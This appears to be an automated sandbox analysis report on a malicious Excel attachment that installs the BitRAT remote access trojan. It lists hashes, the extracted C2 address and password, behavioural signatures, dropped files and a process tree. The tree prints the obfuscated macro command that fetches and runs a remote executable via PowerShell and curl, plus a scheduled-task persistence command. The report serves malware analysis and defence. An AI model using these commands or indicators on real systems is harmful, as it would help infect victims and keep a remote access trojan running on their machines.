Analysis

  • max time kernel
    50s
  • max time network
    80s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-09-2023 08:46

General

  • Target

    Documento_Orslgroup_S.R.L_09_2023.xls

  • Size

    100KB

  • MD5

    c678822324d3db11afb66ad4dc9a5bb8

  • SHA1

    db82a3d3de0b0d90cc302e903e18dd9d2fb684c4

  • SHA256

    d77795d4563d03c0ec79533ac468580fa94ae26a54b5e14e34c3d6bdf9ae51b0

  • SHA512

    7a753d605ee1e5e14d3dbf0a67feb80c8fee21c0bdc7cba36298eead743b541e65d5d4d3f25124ec8d4ad54c38744f244bb721f7c0edb76d1a3441c0d291d03e

  • SSDEEP

    3072:BrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnA9tJE2zuxq+fr9wBLa71ba2ryLTHeYD:pxEtjPOtioVjDGUU1qfDlavx+W2QnAnF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Documento_Orslgroup_S.R.L_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4748
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/SkazYLa2BT/happy.e^xe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/SkazYLa2BT/happy.exe -o C:\Users\Public\pxpr0.exe;C:\Users\Public\pxpr0.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1000
        • C:\Users\Public\pxpr0.exe
          "C:\Users\Public\pxpr0.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3916
          • C:\Users\Public\pxpr0.exe
            "C:\Users\Public\pxpr0.exe"
            5⤵
            • Executes dropped EXE
            PID:700
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 700 -s 188
              6⤵
              • Program crash
              PID:5108
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c copy "C:\Users\Public\pxpr0.exe" "C:\Users\Admin\AppData\Roaming\hope\hope.exe"
            5⤵
              PID:4924
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hope\hope.exe'" /f
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:748
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\hope\hope.exe'" /f
                6⤵
                • Creates scheduled task(s)
                PID:3452
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\hope"
              5⤵
                PID:3444
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 700 -ip 700
        1⤵
          PID:3628
        • C:\Users\Admin\AppData\Roaming\hope\hope.exe
          C:\Users\Admin\AppData\Roaming\hope\hope.exe
          1⤵
          • Executes dropped EXE
          PID:3052

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xchoc0xk.5jj.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\hope\hope.exe
          Filesize

          7.6MB

          MD5

          9f42c993b0f9560fce2ac89d5b823b3b

          SHA1

          7c3ae9d0a92335ec5076490af4544a071d69c6d4

          SHA256

          3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

          SHA512

          867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

        • C:\Users\Admin\AppData\Roaming\hope\hope.exe
          Filesize

          1.1MB

          MD5

          668188a453e8a4597b3164afbed8f6aa

          SHA1

          262995835e9b945b2a05bb0912d20fe1b5d2d96a

          SHA256

          f3e481c780dbf6945e63cb0bef9c6242501822d1a692e5a0bb731b919fe00c74

          SHA512

          07534bc0758d9c2e60d7a75765986f019cbcb6c04b29f9e2bf8e437a4faeb60fa2cd082928cc99ef26b8ea034b8e6292c3bbae56bd9225d0c25fb0e0782fcbcc

        • C:\Users\Admin\AppData\Roaming\hope\hope.exe
          Filesize

          2.9MB

          MD5

          c17d542c4fddd363605a076f41d75820

          SHA1

          1f471e59d310846850ca78ff9ca407428d5b1e6c

          SHA256

          2c324acdc8de83b5ee135fa75f252f324461722219ce1d710371d9b80e4e57c0

          SHA512

          a13b732b3954ced8e48afbb37eb6fc847a410a7aa00eae55efa41e43e3511abc19ab2d5c35c12e27f43a92249504d711c128cdfde77fd7d6af19d49750076683

        • C:\Users\Public\pxpr0.exe
          Filesize

          7.6MB

          MD5

          9f42c993b0f9560fce2ac89d5b823b3b

          SHA1

          7c3ae9d0a92335ec5076490af4544a071d69c6d4

          SHA256

          3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

          SHA512

          867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

        • C:\Users\Public\pxpr0.exe
          Filesize

          7.6MB

          MD5

          9f42c993b0f9560fce2ac89d5b823b3b

          SHA1

          7c3ae9d0a92335ec5076490af4544a071d69c6d4

          SHA256

          3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

          SHA512

          867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

        • C:\Users\Public\pxpr0.exe
          Filesize

          7.6MB

          MD5

          9f42c993b0f9560fce2ac89d5b823b3b

          SHA1

          7c3ae9d0a92335ec5076490af4544a071d69c6d4

          SHA256

          3e6692760e61b3e71675a24f7b5b50cde09cabf750ede2a9a365c8e482c61943

          SHA512

          867eaa8455f4314e355241374b0eb80bcc7d6f932330e82c0a18a8e79caba014f35621c2bc0e345d294eb95bcecfcfed7652b058c88ae52ebfa82436cc59d379

        • memory/700-88-0x0000000001300000-0x00000000016CE000-memory.dmp
          Filesize

          3.8MB

        • memory/700-83-0x0000000001300000-0x00000000016CE000-memory.dmp
          Filesize

          3.8MB

        • memory/700-78-0x0000000001300000-0x00000000016CE000-memory.dmp
          Filesize

          3.8MB

        • memory/1000-45-0x000002CAF6810000-0x000002CAF6820000-memory.dmp
          Filesize

          64KB

        • memory/1000-56-0x00007FFE6BF00000-0x00007FFE6C9C1000-memory.dmp
          Filesize

          10.8MB

        • memory/1000-43-0x000002CAF6810000-0x000002CAF6820000-memory.dmp
          Filesize

          64KB

        • memory/1000-33-0x000002CAF6270000-0x000002CAF6292000-memory.dmp
          Filesize

          136KB

        • memory/1000-44-0x000002CAF6810000-0x000002CAF6820000-memory.dmp
          Filesize

          64KB

        • memory/1000-42-0x00007FFE6BF00000-0x00007FFE6C9C1000-memory.dmp
          Filesize

          10.8MB

        • memory/1000-57-0x000002CAF6810000-0x000002CAF6820000-memory.dmp
          Filesize

          64KB

        • memory/1000-58-0x000002CAF6810000-0x000002CAF6820000-memory.dmp
          Filesize

          64KB

        • memory/1000-61-0x000002CAF6810000-0x000002CAF6820000-memory.dmp
          Filesize

          64KB

        • memory/1000-70-0x00007FFE6BF00000-0x00007FFE6C9C1000-memory.dmp
          Filesize

          10.8MB

        • memory/3052-93-0x0000000074740000-0x0000000074EF0000-memory.dmp
          Filesize

          7.7MB

        • memory/3916-71-0x0000000074740000-0x0000000074EF0000-memory.dmp
          Filesize

          7.7MB

        • memory/3916-72-0x0000000000E10000-0x00000000015A4000-memory.dmp
          Filesize

          7.6MB

        • memory/3916-73-0x00000000064A0000-0x0000000006A44000-memory.dmp
          Filesize

          5.6MB

        • memory/3916-74-0x0000000005EE0000-0x0000000005EF0000-memory.dmp
          Filesize

          64KB

        • memory/3916-75-0x0000000007A50000-0x00000000081DA000-memory.dmp
          Filesize

          7.5MB

        • memory/3916-84-0x0000000074740000-0x0000000074EF0000-memory.dmp
          Filesize

          7.7MB

        • memory/4748-30-0x000002213CB30000-0x000002213D330000-memory.dmp
          Filesize

          8.0MB

        • memory/4748-9-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-31-0x000002213CB30000-0x000002213D330000-memory.dmp
          Filesize

          8.0MB

        • memory/4748-0-0x00007FFE55370000-0x00007FFE55380000-memory.dmp
          Filesize

          64KB

        • memory/4748-46-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-48-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-49-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-50-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-51-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-52-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-53-0x000002213CB30000-0x000002213D330000-memory.dmp
          Filesize

          8.0MB

        • memory/4748-54-0x000002213CB30000-0x000002213D330000-memory.dmp
          Filesize

          8.0MB

        • memory/4748-55-0x000002213CB30000-0x000002213D330000-memory.dmp
          Filesize

          8.0MB

        • memory/4748-10-0x00007FFE52C20000-0x00007FFE52C30000-memory.dmp
          Filesize

          64KB

        • memory/4748-25-0x000002213CB30000-0x000002213D330000-memory.dmp
          Filesize

          8.0MB

        • memory/4748-21-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-20-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-11-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-8-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-16-0x00007FFE52C20000-0x00007FFE52C30000-memory.dmp
          Filesize

          64KB

        • memory/4748-18-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-19-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-17-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-15-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-14-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-7-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-6-0x00007FFE55370000-0x00007FFE55380000-memory.dmp
          Filesize

          64KB

        • memory/4748-12-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-5-0x00007FFE55370000-0x00007FFE55380000-memory.dmp
          Filesize

          64KB

        • memory/4748-2-0x00007FFE55370000-0x00007FFE55380000-memory.dmp
          Filesize

          64KB

        • memory/4748-4-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-3-0x00007FFE55370000-0x00007FFE55380000-memory.dmp
          Filesize

          64KB

        • memory/4748-1-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB

        • memory/4748-13-0x00007FFE952F0000-0x00007FFE954E5000-memory.dmp
          Filesize

          2.0MB